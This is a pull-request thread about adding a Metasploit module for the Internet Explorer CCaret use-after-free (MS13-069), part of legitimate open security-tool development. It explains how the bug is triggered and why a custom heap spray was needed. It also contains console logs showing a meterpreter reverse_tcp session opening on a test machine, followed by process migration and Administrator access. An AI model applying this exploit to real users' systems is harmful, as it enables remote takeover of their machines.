Add MS13-069 (CVE-2013-3205) IE ccaret object use-after-free

[wchen-r7]

This module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first
setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware aware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code
execution under the context of the user.

The vuln works against IE8 on Win 7, but the current version of the custom spray doesn't actually work well against that target. More work is needed before we can add that target for sure. The reason a custom spray is needed is because the document.write() function erases the typical spray routines we use like js_property_spray, or the heaplib + substring one. Tried using an iframe too, but onbeforeeditfocus event doesn't seem to work well in an iframe (does not fire when innerHTML is used.)

Demo of the exploit:

$ msfcli exploits/windows/browser/ms13_069_caret payload=windows/meterpreter/reverse_tcp lhost=10.0.1.76 lport=4444 E
[*] Initializing modules...
payload => windows/meterpreter/reverse_tcp
lhost => 10.0.1.76
lport => 4444
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/awQRdVP83x
[*]  Local IP: http://10.0.1.76:8080/awQRdVP83x
[*] Server started.
msf exploit(ms13_069_caret) > [*] 10.0.1.89        ms13_069_caret - Sending exploit...
[*] Sending stage (770048 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:3096) at 2013-09-19 21:58:10 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.89:3096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3140)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1080
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) >

[jvazquez-r7]

Processing!

[jvazquez-r7]

@wchen-r7 , your branch is giving me problems with the tape_engine_8A file, looks like your branch wasn't sync with rapid7 when you did your changes. Do you mind to mind to merge from or rebase to master? My filesystem can't handle it atm :( anyway, reviewing!

$ git checkout upstream/pr/2399
Note: checking out 'upstream/pr/2399'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at 89500b2... Extra word "aware" in the description
$ git checkout -b land-pr2399
M   modules/exploits/windows/brightstor/tape_engine_8A.rb

[jvazquez-r7]

it isn't needed ... really :P

[jvazquez-r7]

Working:

msf exploit(ms13_069_caret) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://192.168.172.1:8080/1PCbQdPa9o
[*] Server started.
msf exploit(ms13_069_caret) > [*] 192.168.172.217  ms13_069_caret - Sending exploit...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49512) at 2013-09-20 09:24:29 -0500

msf exploit(ms13_069_caret) > 
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49512) processing InitialAutoRunScript 'migrate -f'

msf exploit(ms13_069_caret) > [*] Current server process: iexplore.exe (1944)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2468
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

[wchen-r7]

tape_engine_8A file

That's annoying. Let me see if I can figure it out. Yeah, when I started this branch I still had that problem.

[wchen-r7]

Ended up starting a new branch instead. Please move on to that one, and then I'm closing this.

[corelanc0d3r]

have you tried connecting to it with Win7 IE8 ? IIRC it threw an error on my box (object nil or something like that)

[wchen-r7]

The exploit shouldn't fire against Win 7. Trigger should still work though. Because it was a last minute decision to strip Win 7 target.